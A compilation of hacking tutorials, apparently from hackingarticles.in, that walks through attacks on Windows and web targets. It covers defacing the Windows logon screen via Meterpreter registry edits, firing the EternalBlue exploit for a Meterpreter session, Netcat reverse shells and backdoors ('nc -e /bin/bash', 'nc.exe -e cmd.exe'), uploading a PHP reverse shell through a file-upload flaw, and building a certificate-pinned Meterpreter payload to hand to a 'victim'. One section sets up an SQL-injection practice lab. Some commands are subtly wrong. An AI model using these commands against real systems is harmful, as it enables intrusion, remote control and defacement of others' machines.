Hack Legal Notice Caption of Remote PC

Registry key play an important role in operating system attacker makes use of legal notice registry key to send threaten message on targeted system so that once the system is boot up the user can read the message that “your system has been hacked” which appears before login screen.

Through this article we are showing how an attacker sends threaten message on logon screen to the targeted users.
Let’s start
Attacker : Kali Linux
Target: window 7

Read our previous article how to hack windows 7 and get meterpreter session of victims, inside meterpreter there are so many options for post exploit now type following command to move inside registry key of the victim’s system

Meterpreter > Reg enumkey –k HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Policies\\System

From screenshot you can observe that it contains 2 keys (Audit, UIPI) having 18 different values. The highlighting box is our targeted value.

i)                    Legalnoticecaption

ii)                   legalnoticetext


Now type another command for assigning the value of legalnoticecaption which is use for providing the title or heading of the given message on logon screen.
Meterpreter > Reg enumkey –k HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Policies\\System –v legalnoticecaption –d “IMPORTANT MESSAGE”
From screenshot you can read our registry key is successfully set.


Now type one more command for giving warning message to the targeted system by assigning value of legalnoticetext which will display your message on logon screen of victim’s system.

Meterpreter > Reg enumkey –k HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Policies\\System –v legalnoticetext –d “PWNED BY RAJ CHANDEL”

From screenshot you can read again our registry key is successfully set.

Here –k denote key; -V denote value; -d denote input data.


Now when the victim will start his system after then he will receive our message on logon screen as shown in given screenshot.
Try it yourself!!!

How to set up SQLI Lab in in Kali

Hello everyone, with the joy of having new kali version somewhere few of us are having hard time in setting Dhakkan (AUDI-1) sql series lab in our kali machine.

So today we’ll be learning how to setup Dhakkan lab (one of the best labs I have seen for practicing and understanding SQL INJECTION) in our latest kali machine.
Download from here

Q - Why it is not as simple as it was in older version of kali?
Ans- In latest version of kali we are having PHP version 7.xxx which does not support MySQL functions because it support MySQLi functions.


MySQLi Extension (or simply known as MySQL improved or MySQLi) is a relational database driver that is used mainly in the PHP programming language. 


So we have 2 ways to set up

1-      Degrade your PHP version to 5.xx
2-      Change code of original Dhakkan lab to make it work with latest kali.
We’ll change code of labs.

Q- How I came to know that this is the issue?
Ans – When I set up my lab and browse it from my browser I saw I was unable to set up database required, See below screenshot


In the above screenshot see the URL .So now I know something is wrong in setup-db.php so I tried to run this specific file in my kali, see screenshot



So after googling the error I came to know I have to replace mysql_connect() with mysqli_connect()

After making this change when I run setup.php again I came across new error, see screenshot


So I replace mysql_query($sql) with mysqli_query($con, $sql)
($con is the connection link we made to our database) if you don’t know php don’t worry simply replace mysql_query($sql) with mysqli_query($con, $sql)
So this is how I debug the issue.
Now I am summarizing the changes that I made and you have to do to set up your lab.
Simply use Ctrl+F and replace all feature to make changes at a fast pace.
You have to make changes in index.php of ALL lessons, other php files in lessons and in all php files present in sql-connections Folder.
(Or you can contact me to get the edited lab)
S.No
Replace
Replace By



1
mysql_query($sql)
mysqli_query($con, $sql)
2
mysql_error()
mysqli_error($con)
3
mysql_fetch_array($result)
mysqli_fetch_array($result, MYSQLI_BOTH)
4
mysql_fetch_array($result1)
mysqli_fetch_array($result1, MYSQLI_BOTH)
5
mysql_connect($host,$dbuser,$dbpass)
mysqli_connect($host,$dbuser,$dbpass)
6
mysql_real_escape_string($value)
mysqli_real_escape_string($con, $value)
7
mysql_select_db($dbname, $con)
mysqli_select_db($con, $dbname)

After making the above changes copy complete sqli-labs folder in /var/www/html folder of kali

 Now open kali terminal and move to this folder using command “cd /var/www/html”


Now give permissions to sqlilabs folder using command “chmod 777 sqlilabs”


Now move to sqlilabs folder using command “cd sqlilabs” And give permissions to all files and folder in it using command “chmod 777 *”


Now your lab is ready to use you can access you lab using your browser Ip of your kali machine/sqlilabs


Click on Setup/reset Database for labs



Database set now practice and enjoy and use you skill to help organizations in securing their apps and applications from hackers. Don’t test it on sites for which you don’t have written permission to do so. It is illegal you may end up going behind the bars and ruin your career.

We are very thankful to Audi-1(aka Dhakkan) for creating such an interesting and awesome environment for us to understand and practice SQL injection.

Exploit Windows PC using EternalBlue SMB Remote Windows Kernel Pool Corruption

This module is a port of the Equation Group ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers. There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the original may not trigger 100% of the time, and should be run continuously until triggered. It seems like the pool will get hot streaks and need a cool down period before the shells rain in again.

 Let’s start!!!
Attacker: Kali Linux
Target: window 7

Open the terminal in your Kali Linux type msfconsole to load metasploit framework.

msfconsole


Use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.8
msf exploit(ms17_010_eternalblue) >set 192.168.1.21
msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) >exploit

From screenshot you can see we have got meterpreter session after buffer overflow exploited by overwriting SMBV1 buffer.
Meterpreter> sysinfo

Netcat Tutorials for Beginner

In the field of hacking most utilized and powerful tool use by attack is popularly known as “Netcat” which is a computer networking function for analyzing from and writing to network connections using TCP or UDP. Netcat is designed to be a dependable back-end that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool; since it can create almost any kind of connection its user could need and has a number of built-in capabilities.

Netcat is at the same time very easy and multipurpose, it's like trying to explain everything you can do with your Swiss Army knife.
For examples:-

·         Banner garbing
·         Bind shell (backdoor)
·         Chatting
·         File uploading and downloading
·         Port scanning
·         Port knocking
·         Port forwarding
·         Show webserver HTTP file contents

There are so many options inside netcat to enhance it function and effect when you will type nc –h in terminal of kali Linux. Before getting inside its working details you must aware of that here we had use two system one as attacker another as target system.  
Let’s begin

Port Knocking

Open the terminal of your kali Linux and type following command which contains target’s IP and target port number.
Nc 192.168.1.21 2222

So when the given command will be executed it will tell about hidden running service through knocking the port, from given below image you can observe that port 2222 is open for SSH.


Reverse Shell

Mainly attacker use netcat as backdoor for making unauthorized accessing target’s system, in this an attacker activates listening port (random port) when scan any vulnerable target .

nc –e /bin/bash 192.168.1.21 4444

Above command will be waiting for reverse connect from victim’s system.
In given screenshot you can see the running web site is suffering from os command injection vulnerability now use nc –e /bin/bash 192.168.1.21 4444 to establish connection between victim and attacker’s system which will allow unauthorized access by creating backdoor.


Here you can see successfully we have (attacker) access victim’s shell through netcat.


Netcat as a Backdoor
Download netcat.exe for windows and type following command
Nc.exe 192.168.1.21 4444 –e cmd.exe


From given screenshot you can perceive that attacker successfully get connected with windows client through netcat
Nc –lvp 4444


File Upload Exploitation
We will look how an attacker can exploit file upload vulnerability through netcat shell. From given image it is clear that the targeted webserver allow its client to upload an image.


For uploading we have use php-reverse-shell.php instead of image which a php backdoor. Open this web shell for editing listener IP i.e. your kali Linux IP (192.168.1.21) and then activate netcat using following command which will wait for establishing reverse connection with victim’s system.
Nc –lvp 1234


Now after uploading your php backdoor inside web server and execute the file which will connect the victim’s system from attacker machine.


Hence you can see attacker successfully made unauthorized access through netcat shell.


HTTP Request

Use Netcat to fetch web page information from a webserver.  With Netcat you can search out the full HTTP header so you can see running particular site in web server. Now type following command that make a connection to port 80.

Nc 192.168.1.11 80
OPTIONS / HTTP/1.0

From screenshot you can read the detail of http header of the targeted web site.


Port Scanning
Netcat can also scan the TPC & UDP port hence it can be use in the place of NMAP which will tell us about open and close port of the targeted IP

The following command shows target IP and port range

-z:zero-I/O mode [used for scanning]
-w:timeout for connects and final net reads
-v:-v verbose
-l:listen mode, for inbound connects
-n:numeric-only IP addresses,


From resultant image you can see open ports with running services


Chatting
Netcat is also used for the chatting from between two systems. We require putting together the Netcat to listen on a specific port on both system and connect to specific address.

Nc –lvp 5678


Nc 192.168.1.21 5678
Hi
How are you
Visit www.hackingarticles.in


File Transfer
As you know in windows we have download netcat.exe file now here I had use it for uploading a text file t.txt on targeted system through specific port.

Nc 192.168.1.21 5555 < t.txt


Now receiver can download that t.txt file by giving similar port number that will establish connection between both systems.
Nc –lvp 5555 > /root/Desktop/t.txt

Exploit Remote PC with SSL Certified Meterpreter Payload using MPM

Through this article you can learn how an attacker would able to generate a SSL certificate for any exe or bat file payloads so that he might be able to establish a connection with host through meterpreter session.

The firewall spoof the network traffic and verifies trust certificates to establish connection itself as a trusted third party to the session between the client and the server. When the client begins with an SSL session with the server, the firewall capture the client SSL request and forwards the SSL request to the server. The server sends a certificate for the client that is captured by the firewall. If the server certificate is signed by a CA that the firewall trusts, the firewall generates a duplicate of the server certificate signed by the Forward Trust certificate and forward the certificate to the client to authenticate. 

Meterpreter_Paranoid_Mode.sh allows users to secure your staged/stageless connection for Meterpreter by having it check the certificate of the handler it is connecting to.

Open the terminal in your kali Linux and type following to download it………….



Once it downloaded run the program file and follow the given below steps.

Press enter to continue



A prompt will open in which you have to choose option for building certificate from given screenshot you can read I had chosen impersonate domain.
                                               

 We start by generating a certificate in PEM format, once the certs have been created we can create a HTTP or HTTPS or EXE payload for it and give it the path of PEM format certificate to be used to validate the connection.

After that again another prompt will open in which you would be ask to mention the domain name, here the SSL certificate will generate for www.hackingarticles.in


To have the connection validated we need to tell the payload what certificate  the handler will be using by setting the path to the PEM certificate in the HANDLERSSLCERT option then we enable the checking of this certificate by setting stagerverifysslcert to true.

PEM is a widely used encoding format for security certificates. Syntax and content is defined by X.509 v3 standards for digital certificates, defined in IETF RFC 5280 specifications. The main file extensions are .pem, .crt, .ca-bundle. A PEM certificate is a base64 (ASCII) encoded block of data encapsulated between.
In next prompt choose payload category for auto building payload, from given list I chose stagless (payload.exe)


Once that payload is created we need to create a handler to receive the connection and again we use the PEM certificate so the handler can use the SHA1 hash for validation. Just like with the Payload we set the parameters HANDLERSSLCERT with the path to the PEM file and stagerverifysslcert to true.
 We can see the stage doing the validation when we recite a session back.

 Enter LHOST 192.168.0.108 (attacker’s IP)


Similarly given any random port for reverse connection from host system nd click on ok.
Enter lport 8888


Again list of payload will open from that prompt choose desire payload which will generates payload for attack.
Windows/meterpreter_reverse_http


This will configure all setting and start multi handler by lunching metasploit framework


When you move inside output folder here you will get two files; first for exe payload another for .pem certificate. Now use your effort for sharing exe file with your victim and wait for session establishment through meterpretre.


On other hand you can compare .pem certificate from other original certificate signed by CA, if you will observe given below image you can read certification details for hackingarticles.in which as similar as CA singed certificates.


Hence you can see I have successfully established the meterpreter session with victims system.
Try it by yourself!!!